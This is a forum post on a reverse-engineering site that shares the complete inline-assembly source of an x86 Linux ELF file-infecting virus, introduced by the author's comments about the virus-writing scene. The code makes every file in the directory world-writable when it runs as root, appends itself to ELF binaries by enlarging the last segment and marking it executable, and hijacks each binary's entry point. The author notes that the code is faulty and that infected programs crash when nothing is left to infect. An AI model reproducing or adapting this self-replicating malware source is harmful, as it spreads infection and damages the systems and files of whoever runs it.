Jump to content
Tuts 4 You

x86 Linux Parasite

JMC31337

By JMC31337
in Malware Reverse Engineering

 Share

Recommended Posts

JMC31337

JMC31337

Posted
Posted 
//./gcc -m32 -masm=intel -o file file.c
//https://www.cs.bgu.ac.il/~caspl152/wiki.files/ps05_152.pdf\
//One-oh-one on Linux Virii written by herm1t (x) VxHeavens.com, June 2010

//Since Ive now written a parasite in both x86 formats (Win & Lin)
//Things need to be said about this knowledge and power
//When I 1st began writing viruses (or virii for all those correctedness types
//I strove to be as a good as 29A - still i fall short of such titles
//I owe my mentor herm1t  (and other VXRs) a ton of respect
//for putting up with my constant annoyances of every line and piece of new code
//added - thanks herm1t for not holding my hand (in facf youre tutorial insists upon
//c-coding one (why use ASM? more of a challenge, and i save c-code VXng for
//rootkits.) Lulz and thanks to everyone else out there who (because I am bad for
//reputational marketing images) i wont know, but thanks for
//putting up with me, and, my prior VX codes that were not so good (which ill fix up in time)
//The VX scene isnt dead, though the VXR is not looked at too kindly these days
//contrary to those of old days, now that cybermalware has reached the apex of
//causing billions of $$ worth of problems to govt's and systems of the world yearly
//We true VXR who only set out to show knowledge can never condone ruining another
//system but its what you set out to do with this knowledge that makes you
//
//This thing isnt perfect. My itr82 jump is faulty (so no files to infect causes problems.)
//I was going to fix it, until I realized after testing it against 3 hello-world GTK
//and 3 hello-world c-codes that so long as the parasite can eat and live, all programs
//will work fine post-infection. If the parasite has a host the parasite lives on, and so 
//hopefully, with a proper Commensalism relationships in place, so does the host.
//No files to infect, and the infected host seg-faults and dies turning it into
//a Parasitism relationship - but feed it some progs and alive it is again
//This parasite only adds its replicator code, it does no true damage (unless i messed up)
//--"The Lord will even dwell within the darkness" Solomon 1 Kings 8:12

asm(".intel_syntax noprefix\n");

void main()
{
asm(
	
	"_code:\n"
	"call _start\n"
	"_start:\n"
	"pushad\n"
	
//=======================================================================
//GRAB DIRECTORY ENTRIES
//USE STACK SPACE FOR NOW
//		        eax 	 	ebx 	                             	       ecx            edx 	         esi 	edi
//sys_open        0x05 	const char __user *filename     int flags    int mode	  -	  -	

//		        eax 	        ebx 	                        ecx                                                   edx 	                        esi 	edi
//sys_getdents	0x8d	unsigned int fd	struct linux_dirent __user *dirent	unsigned int count	  -	   -	
	
	"_getdents:\n"
	"push 0x2e\n" //push "." to stack
	"mov ebx,esp\n" //load the reg with it
	"xor ecx,ecx\n" //set option to R_ONLY
	"mov edx,0x400\n" //READ_ONLY
	"mov eax,0x05\n" //call open dir
	"int 0x80\n"
	
	"sub esp,0x500000\n"
	"mov ebx,eax\n"
	"mov eax,0x8d\n" //getdents
	"mov ecx,esp\n" //store to stack
	"mov edx,0x500000\n" //len of reserved space for getdents info
	"int 0x80\n"  //[esp-0x500000] = getdents stuff
	
//=======================================================================
// GOT ROOT?
//IF SO CHMOD ALL FILES
//			eax 	      ebx   ecx   edx   esi   edi
//sys_getuid	0xc7	-	-	-	-	-

"mov eax,0xc7\n"
"int 0x80\n"
"cmp eax,0x00\n" // ROOT=0x00
"jne _root_chmod_skip\n"


//===================================================
//WE GOT ROOT CHMOD RWE ALL FILES 0x777
//ESP = getdents struct
//			eax 	 ebx 	                                ecx 			edx 	esi 	edi
//sys_chmod	0x0f	 const char __user *filename	mode_t mode     -       -       -
	
	"_root_chmod:\n"
	"mov ebp,esp\n"
	"mov ebx,ebp\n"
	
	//EBP=GETDENTS
	//=====================================
	"xor edi,edi\n"
	"_iter8:\n"
	"xor ecx,ecx\n"
	"mov cx,word ptr [ebx+0x08]\n"
	"add ecx,ebx\n"
	"cmp byte ptr[ecx-1],0x00\n"
	"je _root_chmod_skip\n"
	"push ecx\n" //start of next entry
	"cmp byte ptr [ecx-0x01],0x08\n"
	"je _ffound\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter8\n"
	//=====================================
	"_ffound:\n"
	"mov ecx,ebx\n"
	"add ecx,0x0A\n"
	"push ebx\n"
	"mov ebx,ecx\n"  //ebx & ecx=fname
	"mov eax,0x0f\n" //CHMOD
	"mov ecx,0x1ff\n" //RWE ALL USERS
	"int 0x80\n"  //call
	"pop ebx\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter8\n"
	//===================================
	
//=================================================
//CONTINUE WITH
//PRIVS WE HAVE AND HOPE
//FOR THE BEST
//=================================================


	"_root_chmod_skip:\n"
	"mov ebp,esp\n"
	"mov ebx,ebp\n"
	"xor edi,edi\n"
	"_iter82:\n"
	"xor ecx,ecx\n"
	"mov cx,word ptr [ebx+0x08]\n"
	"add ecx,ebx\n"
	"cmp byte ptr[ecx],0x00\n"   //<--------------****safety loop****
	"je _code_end\n"
	"push ecx\n" //start of next entry
	"cmp byte ptr [ecx-0x01],0x08\n"
	"je _ffound2\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter82\n"
	//=====================================
	"_ffound2:\n"
	"mov ecx,ebx\n"
	"add ecx,0x0A\n" //ECX=FNAME
	"push ebx\n"  
	
	"jmp _stat\n"
	"_stat_ret:\n"
	
	
//AT THIS POINT
//[EDI]=HEAP START
//[EBP]=GETDETNS INFO
//[ESI]=FSIZE
//[ESP]= ->GETDENTS.FNAME@0x0A

	"jmp _fopen\n"
	"_fopen_ret:\n"
	"jmp _fread\n"
	"_fread_ret:\n"
	"jmp _is_elf\n"
	"_is_elf_ret:\n"
	
	//infect ELF heap
	//write ELF heap to file
	//close 
	
	"pop ebx\n"
	"pop ecx\n"
	"mov ebx,ecx\n"
	"jmp _iter82\n"
	//===================================
 
//===========================================
//IS IT AN ELF FILE?
"_is_elf:\n"

"cmp dword ptr[edi],0x464c457f\n"  //.FLE
"jne _is_elf_ret\n"
"cmp byte ptr[edi+0x04],0x01\n" //x86 file?
"jne _is_elf_ret\n"
"cmp byte ptr[edi+0x05],0x01\n" //LSB?
"jne _is_elf_ret\n"

"xor eax,eax\n"
"mov al,byte ptr[edi+0x28]\n"
"xor ecx,ecx\n"
"mov cx,word ptr[edi+0x2a]\n"
"xor edx,edx\n"
"mov dx,word ptr[edi+0x2c]\n"

"add eax,edi\n"

"_hdr_iter8:\n"
"cmp dword ptr[eax],0x01\n"
"je _hdr_mod\n"
"cmp dword ptr[eax],0x07\n"
"ja _is_elf_ret\n"

"_itr8_rep:\n"
"add eax,ecx\n"
"jmp _hdr_iter8\n"

"_hdr_mod:\n"
//[eax]=P_hdr_start
"cmp [eax+0x08],esi\n"
"jb _itr8_rep\n" 

"mov ecx,[eax+0x1c]\n" //ecx=seg_align
"add ecx,ecx\n"
"mov edx,[eax+0x14]\n"
"add edx,ecx\n"
"or edx,0x0fff\n"
"xor edx,0xfff\n" //edx=align*2    +  p_fsize| ||  
"mov [eax+0x14],edx\n"
"mov [eax+0x10],edx\n" //file_heap_fsize & memsize incr
"mov edx,0x00000007\n"
"mov [eax+0x18],edx\n" //last seg is RWE



//lets store the orig_ep into an unreserved header location
//and head to EOF
"mov ecx,edi\n"
"mov edx,[ecx+0x18]\n" //edx=orig EP
"mov [ecx+0x0c],edx\n"  //@file_heap[elf_hdr+0x0c]=host orig_ep
"mov ecx,edi\n"
"add ecx,esi\n"

//=========================================
//WE ADJUSTED THE LAST LOAD SEGMENT
//WE ADDED 0x1000 2 HEAP WHEN ALLOCATED
//NOW ADD IN SHELL+PARASITIC CODE
"pushad\n"  //save reg state
"call _delta\n"
"_delta:\n"

"mov edi,ecx\n"
"pop esi\n" //esi should have code start loc.
"sub esi,0x124\n"
"mov ecx,0x280\n" //# of bytes
"rep movsb\n"

//=========================================

//NOTE: change Orig_ep ->shell

"mov ecx,[esp]\n" //ecx=ELF in heap
"add ecx,0x18\n"
//edi = eof+para_end

//get current base
"call _delta2\n"
"_delta2:\n"
"pop ecx\n"
"or ecx,0xfff\n"
"xor ecx,0xfff\n"

//eax = heap file_last_seg
//ecx = orig host ep seg 
//edx = orig host ep value
//esi = orig host ep seg 0xfff
//edi = heap file eof
//esp = heaped file
//[esp+0x04] = fsize host
//edi-0x200 = host eof parasite start
//[esp+0x1c] = ptr -> last seg 
//get last seg align
//calc va of parasite and write it into host ep
//calc host orig ep and write opcode jump to it
//get parasite start location -> EOF_host

//write "X" infected
//add cmp to detect eof "x"

"mov ebx,edi\n"
"sub ebx,0x200\n"
"push ebx\n"
"mov ebx,eax\n"
"add ebx,0x1c\n"
"mov ebx,[ebx]\n"
"add [esp],ebx\n"
"pop ebx\n"
"push edx\n"
"mov edx,[esp+0x04]\n"
"add edx,0x18\n"
"or ebx,0xffff0000\n"
"xor ebx,0xffff0000\n"

"mov ecx,eax\n"
"add ecx,0x1c\n"
"mov ecx,[ecx]\n"
"mov ebx,[esp+0x08]\n"
"add ebx,ecx\n"
"mov [edx],ebx\n" //hello == 4cac
"pop edx\n"


//============================================================
//			eax 		ebx 				ecx 					edx 			esi 	edi
//sys_write	0x04	unsigned int fd	const char __user *buf	size_t count	-	-
//		        eax 	 	ebx 	                             	       ecx            edx 	         esi 	edi
//sys_open        0x05 	const char __user *filename     int flags    int mode	  -	  -	

"mov eax,0x05\n"
"mov ebx,[esp+0x20]\n"
"add ebx,0x0a\n"
"mov ecx,0x02\n"
"mov edx,0x700\n"
"int 0x80\n"
"mov ebx,eax\n"
"mov eax,0x04\n"
"mov ecx,[esp]\n"
"mov edx,[esp+0x04]\n"
"add edx,0x1000\n"
"int 0x80\n"
//============================================================









"popad\n" //restore reg state
"jmp _code_end\n" //DEBUG******** 1-file COMMENT****** all-files

"jmp _is_elf_ret\n"
//===========================================


//==================================================
//		  eax        ebx 	                         ecx 	                         edx 	esi 	edi
//sys_read	  0x03   unsigned int fd	char __user *buf	size_t count	  -	   -
"_fread:\n"

"mov ebx,eax\n"
"mov eax,0x03\n"
"mov ecx,edi\n"
"mov edx,esi\n"
"int 0x80\n"

"jmp _fread_ret\n"
//===================================================
//		        eax 	 	ebx 	                             	       ecx            edx 	         esi 	edi
//sys_open        0x05 	const char __user *filename     int flags    int mode	  -	  -	
"_fopen:\n"

"mov ebx,[esp]\n"
"add ebx,0x0a\n"
"mov eax,0x05\n"
"mov ecx,0x02\n"
"mov edx,0x700\n"
"int 0x80\n"

"cmp eax,0x00\n"
"jge _fopen_ret\n"

"pop ebx\n"
"pop ecx\n"
"mov ebx,ecx\n"
"jmp _iter82\n"
	



//"jmp _fopen_ret\n"

//=============================================
//		        eax 		ebx 					ecx 						edx 	esi 	edi													
//sys_newstat	0x6a	char __user *filename	struct stat __user *statbuf	  -	  -	  -
"_stat:\n"
"sub esp,0x100\n"
"mov eax,0x6a\n"
"mov ebx,ecx\n"
"mov ecx,esp\n"
"int 0x80\n"
//[ecx+0x14]=fsize

	//=====================================
	"_heap_alloc:\n"
	"mov eax,0x2d\n"
	"mov ebx,edi\n"
	"int 0x80\n"
	"mov ebx,eax\n"
	"add ebx,[ecx+0x14]\n" //fix
	"add ebx,0x00001000\n"  //fsize+virus_size****************
	"mov eax,0x2d\n"
	"int 0x80\n"
	"sub eax,[ecx+0x14]\n" //fix
	"sub eax,0x00001000\n" //fsize+virus_size*****************
	//========================
	//CHANGE HEAP TO RWE PRIVS
	"mov edx,0x07\n"
	"mov ebx,eax\n"
	"mov eax,0x7d\n"
	"int 0x80\n"
	//EBX = HEAP ADDRESS RWE
	//========================
	"mov edi,ebx\n"   //EDI=HEAP START
	"mov esi,[esp+0x14]\n"  //ESI=FSIZE
	"add esp,0x100\n"
 	
"jmp _stat_ret\n"


"nop\n"
"nop\n"

//==============================================



//NOTE:JMP TO ORIG HOST EP	
	
	"_code_end:\n"
	"add esp,0x500000\n" //return our stack to its orig state
	
	"add esp,0xc\n"
	"popad\n"
	"pop ecx\n"
	
	"mov edi,[eax]\n"
	"mov ecx,edi\n"
	"add ecx,0x0c\n"
	"add edi,[ecx]\n"
	"xor ecx,ecx\n"
	"jmp edi\n"
	




//================================================
//================================================
//================================================
	
	
	"mov eax,0x01\n"
	"int 0x80\n"
	"nop\n"
	"nop\n"
	"nop\n"
	);
}

 

  • Like 1

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...